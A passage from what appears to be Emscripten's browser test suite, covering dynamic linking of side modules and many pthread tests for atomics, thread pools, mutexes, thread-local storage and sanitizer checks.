self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output, emcc_args=[]):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'] + emcc_args)
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('main.c', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
return 0;
}
''')
create_file('side.c', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sLEGACY_GL_EMULATION', '-lSDL', '-lGL', 'side.wasm'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('main.c', r'''
#include <assert.h>
int side1();
int side2();
int main() {
assert(side1() == 1);
assert(side2() == 2);
return 0;
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-sSIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-sSIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# reffer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <cassert>
#include <thread>
#include <emscripten/emscripten.h>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
assert(side1_ptr == &side1);
assert(side2_ptr == &side2);
emscripten_force_exit(0);
}).detach();
emscripten_exit_with_live_runtime();
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.cpp'),
args=['-Wno-experimental', '-pthread', '-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-sASSERTIONS', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=16MB', '-sTOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', read_file(path_from_root('src/shell_minimal.html')).replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-gsource-map', '-std=gnu11', '-xc', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sTOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread/test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=3', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=2', '-sPTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=1', '-sPTHREAD_POOL_SIZE_STRICT=2', '-DSMALL_POOL'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest_exit(test_file('pthread/test_pthread_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_64bit_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_64bit_cxx11_atomics(self, opt):
for pthreads in [[], ['-sUSE_PTHREADS']]:
self.btest_exit(test_file('pthread/test_pthread_64bit_cxx11_atomics.cpp'), args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest_exit(test_file('pthread/test_pthread_hardware_concurrency.cpp'), args=['-O2', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread/main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sPROXY_TO_PTHREAD', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_fetch_and_op.cpp'), args=args + ['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed', '--profiling-funcs']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-O2', '-sPTHREAD_POOL_SIZE=8'])
# Tests the rest of the remaining GCC atomics after the two above tests.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_gcc_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest_exit(test_file('pthread/test_pthread_gcc_spinlock.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest_exit(test_file('pthread/test_pthread_create.cpp'),
args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-sMINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest_exit(test_file('pthread/test_pthread_preallocates_workers.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest_exit(test_file('pthread/test_large_pthread_allocation.cpp'), args=['-sINITIAL_MEMORY=128MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -sPROXY_TO_PTHREAD option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest_exit(test_file('pthread/test_pthread_proxy_to_pthread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_nested_spawns.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest_exit(test_file('pthread/test_pthread_join.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest_exit(test_file('pthread/test_std_thread_detach.cpp'), args=['-sUSE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest_exit(test_file('pthread/test_pthread_cancel.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread/test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-sUSE_PTHREADS=1', '-sPTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest_exit(test_file('pthread/test_pthread_kill.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest_exit(test_file('pthread/test_pthread_cleanup.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest_exit(test_file('pthread/test_pthread_mutex.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest_exit(test_file('pthread/test_pthread_attr_getstack.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest_exit(test_file('pthread/test_pthread_malloc.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest_exit(test_file('pthread/test_pthread_malloc_free.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sINITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest_exit(test_file('pthread/test_pthread_barrier.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest_exit(test_file('pthread/test_pthread_once.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_spawns.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '--closure=1', '-sENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest_exit(test_file('pthread/test_pthread_volatile.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest_exit(test_file('pthread/test_pthread_thread_local_storage.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest_exit(test_file('pthread/test_pthread_condition_variable.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest_exit(test_file('pthread/test_pthread_printf.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sLIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest_exit(test_file('pthread/test_pthread_iostream.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd/io.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sWASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@also_with_wasm2js
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest_exit(test_file('pthread/test_pthread_setspecific_mainthread.c'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS'])
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest_exit(test_file('pthread/test_pthread_file_io.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']]:
self.btest_exit(test_file('pthread/test_pthread_supported.cpp'), args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread/test_pthread_dispatch_after_exit.c'), args=['-sUSE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.set_setting('EXIT_RUNTIME')
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
_Atomic int result = 0;
void *thread_main(void *arg) {
result = 1;
pthread_exit(0);
}
int main() {
pthread_t t;
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
assert(result == 1);
return 0;
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.worker.js', Path('cdn/test.worker.js'))
if os.path.exists('test.html.mem'):
shutil.copyfile('test.html.mem', Path('cdn/test.html.mem'))
self.run_browser('test.html', '', '/report_result?exit:0')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test2.html'], reporting=Reporting.JS_ONLY)
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?exit:0')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest_exit(test_file('pthread/test_pthread_proxying_in_futex_wait.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest_exit(test_file('pthread/test_pthread_sbrk.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-sINITIAL_MEMORY=128MB'])
# Test that -sABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-sUSE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-sABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread_flood.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest_exit(test_file('pthread/call_async.c'), args=['-sUSE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js'), '-sEXPORTED_FUNCTIONS=_main,_malloc'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-sWASM_ASYNC_COMPILATION=0']
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest_exit(test_file('pthread/test_pthread_clock_drift.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest_exit(test_file('pthread/test_pthread_utf8_funcs.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@also_with_wasm2js
@requires_threads
def test_pthread_wake_all(self):
self.btest_exit(test_file('pthread/test_futex_wake_all.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sINITIAL_MEMORY=64MB'])
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest_exit(test_file('pthread/test_pthread_stack_bounds.cpp'), args=['-sUSE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest_exit(test_file('pthread/test_pthread_tls.cpp'), args=['-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest_exit(test_file('pthread/test_pthread_tls_main.cpp'), args=['-sUSE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core/test_safe_stack.c'), expected='abort:stack overflow', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sSTACK_OVERFLOW_CHECK=2', '-sTOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
@no_firefox('https://github.com/emscripten-core/emscripten/issues/15978')
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread/test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_asan_use_after_free_2(self):
# similiar to test_pthread_asan_use_after_free, but using a pool instead
# of proxy-to-pthread, and also the allocation happens on the pthread
# (which tests that it can use the offset converter to get the stack
# trace there)
self.btest(test_file('pthread/test_pthread_asan_use_after_free_2.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=1', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free_2.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-sUSE_PTHREADS',
'-sPROXY_TO_PTHREAD',
'-sPTHREAD_POOL_SIZE=2',
'-sEXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core/pthread/test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core/pthread/test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
